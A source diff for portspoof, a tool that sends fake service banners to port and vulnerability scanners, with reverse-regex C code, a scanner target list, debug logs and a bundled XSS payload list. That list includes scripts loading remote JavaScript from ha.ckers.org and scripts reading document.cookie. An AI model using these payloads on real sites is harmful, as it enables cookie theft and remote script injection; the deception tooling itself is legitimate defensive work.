+char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen) //index: '[' ... ']' 
+{
+	//TODO hex support
+	int bslash='\\';
+	int word='w';
+	int digit='d';
+	int range='-';
+
+	//flags
+	char nnot=0;
+	char wordf=0;
+	char digitf=0;
+	char rangeword=0;
+	char rangedigit=0;
+	
+	//character pool
+	char characters[255]={0,};
+	int chari=0;
+	char characterstmp[255]={0,};
+	long character_class=0;
+	
+	//skip first bracket char
+	int i=start_offset+1;
+	int lend_offset=end_offset;
+	int tmpj;
+	
+	if( str[i]=='^') //not flag
+	{
+		i++;nnot=1;
+	}
+	
+	// DEBUG
+	//fprintf(stdout,"%d %d",i,end_offset);
+	
+	for(i;i<lend_offset;i++)
+	{
+		 		
+			if( str[i]==bslash && i+1!=lend_offset ) //special chars - check if character class
+			{
+				if(str[i+1]=='c') 
+					character_class|=1<<1;
+				else if(str[i+1]=='s')
+					character_class|=2<<1;
+				else if(str[i+1]=='S')
+					character_class|=1<<3;
+				else if(str[i+1]=='d')
+					character_class|=1<<4;
+				else if(str[i+1]=='D')
+					character_class|=1<<5;
+				else if(str[i+1]=='w')
+					character_class|=1<<6;
+				else if(str[i+1]=='W')
+					character_class|=1<<7;	
+				else if(str[i+1]=='n')
+					characters['\n']=1;
+				else if(str[i+1]=='r')
+					characters['\r']=1;
+				else if(str[i+1]=='t')
+					characters['\t']=1;
+				else if(str[i+1]=='v')
+					characters['\v']=1;
+				else if(str[i+1]=='f')
+					characters['\f']=1;
+				else if(str[i+1]=='0')
+					characters['\0']=1;
+				else
+					{
+						//DEBUG
+						//fprintf(stdout,"unknown char: %c !\n", str[i+1]); //DEBUG - ignore this char it probably was escaped
+						characters[str[i+1]]=1;
+					}
+				i++;
+				
+			}
+			else if( isalpha(str[i]) && (i+1)!=lend_offset && str[i+1]==range && (i+2)!=lend_offset && isalpha(str[i+2])) //check if rangeword
+			{
+					//DEBUG
+					//fprintf(stdout,"rangew");
+					
+					//add chars from range to the pool
+					tmpj=str[i];
+					for(tmpj;tmpj<=str[i+2];tmpj++)
+					{
+						characters[tmpj]=1;
+					}
+					i+=3;
+					rangeword=1;
+					
+			}
+			else if( isdigit(str[i]) && (i+1)!=lend_offset && str[i+1]==range && (i+2)!=lend_offset && isdigit(str[i+2])) //check if rangedigit
+			{
+					//DEBUG
+					//fprintf(stdout,"ranged");
+					
+					tmpj=str[i];
+					for(tmpj;tmpj<=str[i+2];tmpj++)
+					{
+						characters[tmpj]=1;
+					}
+					i+=3;
+					rangedigit=1;
+					
+			} 
+			else if(str[i]=='.')
+				character_class|=1<<8;
+			else if(str[i]=='|') //TODO: implement this
+				character_class|=1<<9;
+			else
+			{
+				//printf ("# [ char %c ]\n",str[i]);
+				characters[str[i]]=1;
+			} 
+				
+	}
+
+	char endmetachar=str[end_offset+1]; //TODO: should be ok unless one creates "[a-z]", which is invalid regex!
+	int finsize=0;
+	//srand (time(NULL) );
+	
+	// fill character pool
+	if(character_class & 1<<1) 
+	{
+		
+	}
+	else if(character_class & 1<<2) 
+	{
+		
+	}
+	else if(character_class & 1<<3) 
+	{
+
+	}
+	else if(character_class & 1<<4) 
+	{
+		int j='0';
+		for(j;j<='9';j++)
+		{
+			characters[j]=1;
+		}
+		
+	}
+	else if(character_class & 1<<5) 
+	{
+		
+		
+		
+	}
+	else if(character_class & 1<<6) 
+	{
+		int j='a';
+		for(j;j<='z';j++)
+		{
+			characters[j]=1;
+		}
+		
+		j='A';
+		for(j;j<='Z';j++)
+		{
+			characters[j]=1;
+		}
+			
+	}
+	else if(character_class & 1<<7) 
+	{
+		
+	}
+	else if(character_class & 1<<8) 
+	{
+		/*
+		int j=0;
+		for(j;j<255;j++)
+		{
+			characters[j]=1;
+		}
+		
+		characters['\n']=0;
+		*/
+	}
+	else if(character_class & 1<<9) 
+	{
+
+	}
+	
+	
+	// simple support - TODO to extend
+	if(endmetachar=='*')
+		finsize=rand()%10;
+	else if(endmetachar =='+')
+		finsize=1+rand()%9;
+		
+	// DEBUG f
+	//fprintf(stdout,"\n###\n");
+		
+	
+	//TODO to be corrected
+	i=0;
+	for(i;i<255;i++)
+	{
+		if(nnot==0 && characters[i])
+		{
+			characterstmp[chari]=i;
+			chari++;
+			//fprintf(stdout,"%c",i);
+		}
+		else if(nnot && characters[i]==0)
+		{
+			characterstmp[chari]=i;
+			chari++;
+			
+		}
+	}
+			
+			
+	char *finstr=(char*)malloc((finsize+1)*sizeof(char));
+	memset(finstr,0,(finsize+1)*sizeof(char));
+	
+	if(chari)
+	{
+		int tmp;
+		i=0;
+		for(i;i<finsize;i++)
+		{
+			tmp=rand()%chari;
+			finstr[i]=characterstmp[tmp];	
+		}
+	}
+	
+	*retlen=finsize;
+	return finstr;
+}
+
+char * fill_specialchars(char * str,int* param_len, int start_offset,int end_offset)
+{
+	
+	int bslash='\\';
+	int word='w';
+	int digit='d';
+	int dot='.';
+	int newline='n';
+	int creturn='r';
+	int tab='t';
+	
+	
+	char* tmp;	// tmp string for merging
+	int tmplen=end_offset-start_offset;
+	int tmpi=0;
+		
+	
+    if (!(tmp = (char*)malloc(tmplen * sizeof(char))))
+        exit(1);	
+	memset(tmp,0,tmplen);
+	
+
+	int i=start_offset;
+	
+	for(i;i<end_offset;i++)
+	{
+			if(str[i]==bslash && i+1!=end_offset && str[i+1]==word )
+			{
+					tmp[tmpi]=97+rand()%25;	
+					tmpi++;
+					i++;
+					
+					if(i+1!=end_offset && (str[i+1]=='+' ||str[i+1]=='*') )
+						i++;
+					
+			}
+			else if(str[i]==bslash && i+1!=end_offset && str[i+1]==digit )
+			{
+					tmp[tmpi]=48+rand()%10;
+					tmpi++;		
+					i++;
+					
+					if(i+1!=end_offset && (str[i+1]=='+' ||str[i+1]=='*') )
+						i++;	
+				
+			}
+			else if(str[i]==bslash && i+1!=end_offset && str[i+1]==newline )
+			{
+					tmp[tmpi]='\n';
+					tmpi++;
+					i++;	
+			}
+			else if(str[i]==bslash && i+1!=end_offset && str[i+1]==creturn )
+			{
+					tmp[tmpi]='\r';
+					tmpi++;
+					i++;	
+			}
+			else if(str[i]==bslash && i+1!=end_offset && str[i+1]==tab )
+			{
+					tmp[tmpi]='\t';
+					tmpi++;
+					i++;	
+			}
+			else if(str[i]==dot && i!=start_offset && str[i-1]!=bslash)
+			{
+
+					tmp[tmpi]=97+rand()%25;	
+					tmpi++;	
+			}		
+			else
+			{
+				tmp[tmpi]=str[i];
+				tmpi++;
+			}		
+			
+	}
+	
+	char* fin;
+	int finlen=tmpi+1;
+	
+    if (!(fin = (char*)malloc(finlen * sizeof(char))))
+        exit(1);	
+
+	memset(fin,0,finlen);
+	memcpy(fin,tmp,finlen-1);
+	*param_len=finlen-1;
+	
+		return fin;
+}
+
+char* revregex(char * param_str,int* param_len,int start_offset,int end_offset) // with brackets
+{
+	int lnaw='(';
+	int rnaw=')';
+	int lbrak='[';
+	int rbrak=']';
+	int bslash='\\';
+	
+	
+	char* str; //main string
+	int str_len=*param_len;
+	int str_end_offset=end_offset;
+	
+	char* tmp;	// tmp string for merging
+	int tmplen;
+	
+    if (!(str = (char*)malloc((str_len+1) * sizeof(char))))
+        exit(1);	
+	memset(str,0,str_len+1);
+	memcpy(str,param_str+start_offset,str_len);
+	
+	// start
+	int i; 
+	int j;
+	int retlen;
+	char* retstr;
+	repeat1:
+	for(i=start_offset;i<=str_end_offset;i++) // remove () from string
+	{
+		if(str[i]==lnaw && i!=start_offset && str[i-1]!=bslash)
+		{
+			j=i;
+			for(j;j<str_end_offset;j++)
+			{
+				if(str[j]==rnaw && str[j-1]!=bslash ){
+					
+					//fprintf(stdout,"#(%d %d)\n",i,j);
+					//revregex(str,j-i,i+1,j);
+					
+					tmplen=str_len - 2 ;
+					
+					if (!(tmp = (char*)malloc( ( tmplen +	1) * sizeof(char)))) // alloc without the brackets
+				        exit(1);	
+					memset(tmp,0,( tmplen +	1));
+					
+					//get rid of ()
+					memcpy(tmp,str,i); // copy up to index i
+					memcpy(tmp+i,str+i+1,j-i); // copy i-j
+					memcpy(tmp+j-1,str+j+1,str_len-j-1);
+					
+					//fprintf(stdout,"# offset change: %d\n", retlen-(j-i));
+					free(str);
+					str=tmp;
+					str_len=str_len-2;
+					str_end_offset=str_end_offset-2;
+					goto repeat1;	
+				}
+
+				
+			}
+			
+		}
+		
+	}
+	
+	//fprintf(stdout,"#%s\n",str);
+	
+	
+	
+	repeat2:
+	i=start_offset;
+	for(i=start_offset;i<=str_end_offset;i++)
+	{
+		if(str[i]==lbrak && i!=start_offset && str[i-1]!=bslash) // find left bracket
+		{
+			j=i;
+			for(j;j<str_end_offset;j++) //find right bracket (without control char)
+			{
+				if(str[j]==rbrak && str[j-1]!=bslash ){
+					
+
+					//fprintf(stdout,"# [%d %c %d %c ]\n",i,str[i],j,str[j]);
+					retstr=revregex_bracket(str,i,j,&retlen);					
+					
+					// merge it
+				
+					tmplen=str_len - (j-i) + retlen;
+						
+						if (!(tmp = (char*)malloc(tmplen))) 
+					        exit(1);	
+						memset(tmp,0,tmplen);
+						memcpy(tmp,str,i); // copy up to index i
+						memcpy(tmp+i,retstr,retlen); // copy new string
+						memcpy(tmp+i+retlen,str+j+2,str_len-j-1); // copy after index j without control
+						free(str);
+						str=tmp;
+						str_len=tmplen;
+						str_end_offset=str_end_offset+retlen - (j-i);
+						goto repeat2;	
+						
+					}
+
+				
+			}
+			
+		}
+		
+	}
+
+	*param_len=str_len;
+	return str;
+}
+
+int char2hex(char* ptr)
+{
+	unsigned int value = 0;
+	char ch = *ptr;
+	int i=2;
+		   
+		while(i--) {
+		if (ch >= '0' && ch <= '9')
+			value = (value << 4) + (ch - '0');
+		 else if (ch >= 'A' && ch <= 'F')
+			value = (value << 4) + (ch - 'A' + 10);
+         else if (ch >= 'a' && ch <= 'f')
+			value = (value << 4) + (ch - 'a' + 10);	  
+		else
+            return value;    
+	    ch = *(++ptr);
+		}
+	  
+	return value;
+	
+}
+
+int ishex(char* ch)
+{
+	
+	if (*ch >= '0' && *ch <= '9')
+		return 1;
+	 else if (*ch >= 'A' && *ch <= 'F')
+		return 1;
+     else if (*ch >= 'a' && *ch <= 'f')
+		return 1;
+	else
+        return 0;
+
+}
+
+char * escape_hex(char* str,int* final_len)
+{
+	int bslash='\\';
+	int i=0,i2=0;
+	
+	int length=strlen(str);
+	char *str2 = (char*)malloc(length+1);
+	memset(str2,0,length+1);
+	
+	while(*(str+i)!='\0'){
+		if(*(str+i)==bslash){
+			
+		 	if(*(str+i+1)!='\0' && *(str+i+1)=='0'){
+				*(str2+i2)=0;
+				i2++;
+				i++;
+			}
+			else if(*(str+i+1)!='\0' && *(str+i+1)=='x' && *(str+i+2)!='\0' && ishex(str+i+2) && *(str+i+3)!='\0' && ishex(str+i+3))
+				{
+					//fprintf(stdout,"\\%hhx",char2hex(str+i+2));
+					*(str2+i2)=(char)char2hex(str+i+2);
+					i2++;
+					i+=3;
+
+				}
+			else
+			{
+				//fprintf(stdout,"%c",*(str+i));
+			}
+		}
+		else{
+			*(str2+i2)=*(str+i);
+			i2++;
+			
+		}
+		
+	
+		i++;
+	}
+	
+	*final_len=i2;	
+	char* strfin;
+    if (!(strfin = (char*)malloc((i2 + 1) * sizeof(char))))
+        exit(1);
+
+	memset(strfin,0,i2+1);
+	memcpy(strfin,str2,i2);
+	free(str2);
+	return strfin;
+	
+}
+
+/*
+
+char * clear_spaces(char* str)
+{
+	
+	int len=0;
+	int flag=1;
+	int i=0;
+	int j=0;
+	char* str2;
+	
+	len=strlen(str);
+    if (!(str2 = malloc((len+1) * sizeof(char))))
+        exit(1);	
+
+	memset(str2,0,len+1);
+	
+	for(i;i<len;i++)
+	{
+			
+		if(str[i]==' ' && flag==1)
+			{
+			str2[j]=str[i];
+			j++;
+			flag=0;
+			}
+		else if(str[i]==' ')
+			flag=0;
+		else
+			flag=1;
+			
+		if(flag)	
+		{
+			str2[j]=str[i];
+			j++;
+		}
+	
+	}
+	
+	fprintf(stdout,"size %d\n",j);
+	
+	char* strfin;
+    if (!(strfin = malloc((j + 1) * sizeof(char))))
+        exit(1);
+
+	memset(strfin,0,j+1);
+	memcpy(strfin,str2,j);
+
+	free(str2);
+	
+	return strfin;
+	
+}
+*/
+
+std::vector<char> process_signature(std::string str)
+{
+	//cout<<str;
+	//cout.flush();
+	
+	size_t length = str.length();
+	char *str2 =(char*) malloc(length+1);
+	memset(str2,0,length+1);
+	memcpy(str2,str.c_str(),length+1);		
+	int final_len=length;
+	char *str3=revregex(str2,&final_len,0,length-1);	
+	char* str4=fill_specialchars(str3,&final_len,0,final_len);
+	char* str5=escape_hex(str4,&final_len);
+	free(str2);
+	free(str3);
+	free(str4);
+	
+	/*
+	fprintf(stdout,"\n##hex##\n");
+	int t=0;
+	for(;t<final_len;t++)
+	{
+			if(*(str5+t)==0)
+				fprintf(stdout,"\\00");
+			else if(*(str5+t)=='\n')
+				fprintf(stdout,"\\n");
+			else if(*(str5+t)=='\r')
+				fprintf(stdout,"\\r");
+			else
+				fprintf(stdout,"\\%x",*(str5+t));
+	}
+	fprintf(stdout,"\n");
+	*/
+
+	std::vector<char> result_vector;
+	
+	for(int i=0; i<final_len;i++)
+		result_vector.push_back(str5[i]);
+
+	return result_vector;
+	
+}
+
+

src/src/revregex.h

@@ -0,0 +1,62 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdio.h>
+#include <string.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#include <ctype.h>
+#include <vector>
+#include <string>
+#include <iostream>
+
+using namespace std;
+
+#define BUFSIZE 1024
+#define SIGNATURES_SIZE 65535 // max port range
+
+std::vector<char> process_signature(std::string str);
+
+char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen);
+char * fill_specialchars(char * str, int* param_len, int start_offset,int end_offset);
+char* revregex(char * param_str,int* param_len,int start_offset,int end_offset);
+int char2hex(char* ptr);
+int ishex(char* ch);
+char * escape_hex(char* str,int* final_len);
+
+

src/src/stamp-h1

@@ -0,0 +1 @@
+timestamp for src/config.h

src/src/target_list

@@ -0,0 +1,18 @@
+
+Port scanners:
+
+Nmap
+Angry IP Scanner
+Superscan
+NetScanTools
+Unicornscan
+
+Vuln. scanners:
+
+Carrier
+Nessus
+Metasploit pro
+Acunetix 
+Appscan
+Netsparker
+Grendel Scan

src/src/test.tx

@@ -0,0 +1,8 @@
+-> Verbose mode on.
+ new conn - thread choosen: 9 -  nr. of connections already in queue: 0
+ new conn - thread choosen: 8 -  nr. of connections already in queue: 0
+
+---
+Thread nr.8 for port 8106 
+signature sent -> \32\32\30\20\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\20\45\53\4d\54\50\20\4f\70\65\6e\53\4d\54\50\44\r\n
+---

src/src/test.txt

@@ -0,0 +1,8 @@
+-> Verbose mode on.
+ new conn - thread choosen: 9 -  nr. of connections already in queue: 0
+ new conn - thread choosen: 8 -  nr. of connections already in queue: 0
+
+---
+Thread nr.8 for port 8106 
+signature sent -> \32\32\30\20\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\41\20\45\53\4d\54\50\20\4f\70\65\6e\53\4d\54\50\44\r\n
+---

src/src/testfuzz

@@ -0,0 +1,11 @@
+1
+2
+3
+4
+5
+6
+7
+A
+AAA
+AAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAA

src/src/threads.h

@@ -0,0 +1,56 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+#include <pthread.h>
+
+
+extern pthread_cond_t new_connection_cond;
+extern pthread_mutex_t new_connection_mutex;
+
+
+
+#ifndef THREAD_VARS
+#define THREAD_VARS
+
+#define MAX_THREADS    10
+#define MAX_CLIENT_PER_THREAD 30
+
+typedef struct {
+	pthread_t tid;
+	int client_count;
+	int clients[MAX_CLIENT_PER_THREAD];
+} Thread;
+
+#endif

src/src/xss-rsnake.txt

@@ -0,0 +1,303 @@
+%20A
+%20AAAAAAAAAAAAAAAAAA
+<SCRIPT>alert('XSS');</SCRIPT>
+'';!--"<XSS>=&{()}
+<SCRIPT%20SRC=http://ha.ckers.org/xss.js></SCRIPT>
+<IMG%20SRC="javascript:alert('XSS');">
+<IMG%20SRC=javascript:alert('XSS')>
+<IMG%20SRC=JaVaScRiPt:alert('XSS')>
+<IMG%20SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG%20SRC=`javascript:alert("RSnake%20says,%20'XSS'")`>
+<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
+SRC=&#10<IMG%206;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG%20SRC="jav	ascript:alert('XSS');">
+<IMG%20SRC="jav&#x09;ascript:alert('XSS');">
+<IMG%20SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG%20SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG%20SRC="%20&#14;%20%20javascript:alert('XSS');">
+<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20SRC=http://ha.ckers.org/xss.js?<B>
+<IMG%20SRC="javascript:alert('XSS')"
+<SCRIPT>a=/XSS/
+\";alert('XSS');//
+<INPUT%20TYPE="IMAGE"%20SRC="javascript:alert('XSS');">
+<BODY%20BACKGROUND="javascript:alert('XSS')">
+<BODY%20ONLOAD=alert('XSS')>
+<IMG%20DYNSRC="javascript:alert('XSS')">
+<IMG%20LOWSRC="javascript:alert('XSS')">
+<BGSOUND%20SRC="javascript:alert('XSS');">
+<BR%20SIZE="&{alert('XSS')}">
+<LAYER%20SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+<LINK%20REL="stylesheet"%20HREF="javascript:alert('XSS');">
+<LINK%20REL="stylesheet"%20HREF="http://ha.ckers.org/xss.css">
+<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+<META%20HTTP-EQUIV="Link"%20Content="<http://ha.ckers.org/xss.css>;%20REL=stylesheet">
+<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+<IMG%20SRC='vbscript:msgbox("XSS")'>
+<IMG%20SRC="mocha:[code]">
+<IMG%20SRC="livescript:[code]">
+<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=javascript:alert('XSS');">
+<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<META%20HTTP-EQUIV="Link"%20Content="<javascript:alert('XSS')>;%20REL=stylesheet">
+<META%20HTTP-EQUIV="refresh"%20CONTENT="0;%20URL=http://;URL=javascript:alert('XSS');">
+<IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>
+<FRAMESET><FRAME%20SRC="javascript:alert('XSS');"></FRAMESET>
+<TABLE%20BACKGROUND="javascript:alert('XSS')">
+<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
+<DIV%20STYLE="background-image:%20url(&#1;javascript:alert('XSS'))">
+<DIV%20STYLE="width:%20expression(alert('XSS'));">
+<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+<IMG%20STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+<XSS%20STYLE="xss:expression(alert('XSS'))">
+exp/*<XSS%20STYLE='no\xss:noxss("*//*");
+<STYLE%20TYPE="text/javascript">alert('XSS');</STYLE>
+<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A%20CLASS=XSS></A>
+<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+<BASE%20HREF="javascript:alert('XSS');//">
+<OBJECT%20TYPE="text/x-scriptlet"%20DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+<OBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param%20name=url%20value=javascript:alert('XSS')></OBJECT>
+getURL("javascript:alert('XSS')")
+a="get";
+<!--<value><![CDATA[<XML%20ID=I><X><C><![CDATA[<IMG%20SRC="javas<![CDATA[cript:alert('XSS');">
+<XML%20SRC="http://ha.ckers.org/xsstest.xml"%20ID=I></XML>
+<HTML><BODY>
+<SCRIPT%20SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+<!--#exec%20cmd="/bin/echo%20'<SCRIPT%20SRC'"--><!--#exec%20cmd="/bin/echo%20'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+<?%20echo('<SCR)';
+<META%20HTTP-EQUIV="Set-Cookie"%20Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
+<HEAD><META%20HTTP-EQUIV="CONTENT-TYPE"%20CONTENT="text/html;%20charset=UTF-7">%20</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+<SCRIPT%20a=">"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20a=">"%20''%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20"a='>'"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT%20a=`>`%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
+<<scr\0ipt/src=http://xss.com/xss.js></script
+%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
+'%20onmouseover=alert(/Black.Spook/)
+"><iframe%20src="http://google.com"%%203E
+'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
+x”</title><img%20src%3dx%20onerror%3dalert(1)>
+<script>%20document.getElementById(%22safe123%22).setCapture();%20document.getElementById(%22safe123%22).click();%20</script>
+<script>Object.defineProperties(window,%20{Safe:%20{value:%20{get:%20function()%20{return%20document.cookie}}}});alert(Safe.get())</script>
+<script>var%20x%20=%20document.createElement('iframe');document.body.appendChild(x);var%20xhr%20=%20x.contentWindow.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();</script>
+<script>(function()%20{var%20event%20=%20document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22,%20true,%20true,%20window,%200,%200,%200,%200,%200,%20false,%20false,%20false,%20false,%200,%20null);var%20fakeData%20=%20[event,%20{isTrusted:%20true},%20event];arguments.__defineGetter__('0',%20function()%20{%20return%20fakeData.pop();%20});alert(Safe.get.apply(null,%20arguments));})();</script>
+<script>var%20script%20=%20document.getElementsByTagName('script')[0];%20var%20clone%20=%20script.childNodes[0].cloneNode(true);%20var%20ta%20=%20document.createElement('textarea');%20ta.appendChild(clone);%20alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<script>xhr=new%20ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
+<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
+<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
+<%73%63%72%69%70%74>%20%64%20=%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22);%20%64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65));%20%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65%20=%20'(%2e%2a%3f)'%22)[%31]);%20</%73%63%72%69%70%74>
+<script>%20var%20xdr%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);%20%20xdr.open(%22get%22,%20%22/xssme2%3Fa=1%22,%20true);%20xdr.onreadystatechange%20=%20function()%20{%20try{%20%20%20var%20c;%20%20%20if%20(c=xdr.responseText.match(/document.cookie%20=%20'(.*%3F)'/)%20)%20%20%20%20alert(c[1]);%20}catch(e){}%20};%20%20xdr.send();%20</script>
+<iframe%20id=%22ifra%22%20src=%22/%22></iframe>%20<script>ifr%20=%20document.getElementById('ifra');%20ifr.contentDocument.write(%22<scr%22%20%2b%20%22ipt>top.foo%20=%20Object.defineProperty</scr%22%20%2b%20%22ipt>%22);%20foo(window,%20'Safe',%20{value:{}});%20foo(Safe,%20'get',%20{value:function()%20{%20%20%20%20return%20document.cookie%20}});%20alert(Safe.get());</script>
+<script>alert(document.head.innerHTML.substr(146,20));</script>
+<script>alert(document.head.childNodes[3].text)</script>
+<script>var%20request%20=%20new%20XMLHttpRequest();request.open('GET',%20'http://html5sec.org/xssme2',%20false);request.send(null);if%20(request.status%20==%20200){alert(request.responseText.substr(150,41));}</script>
+<script>Object.defineProperty(window,%20'Safe',%20{value:{}});Object.defineProperty(Safe,%20'get',%20{value:function()%20{return%20document.cookie}});alert(Safe.get())</script>
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return%20top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
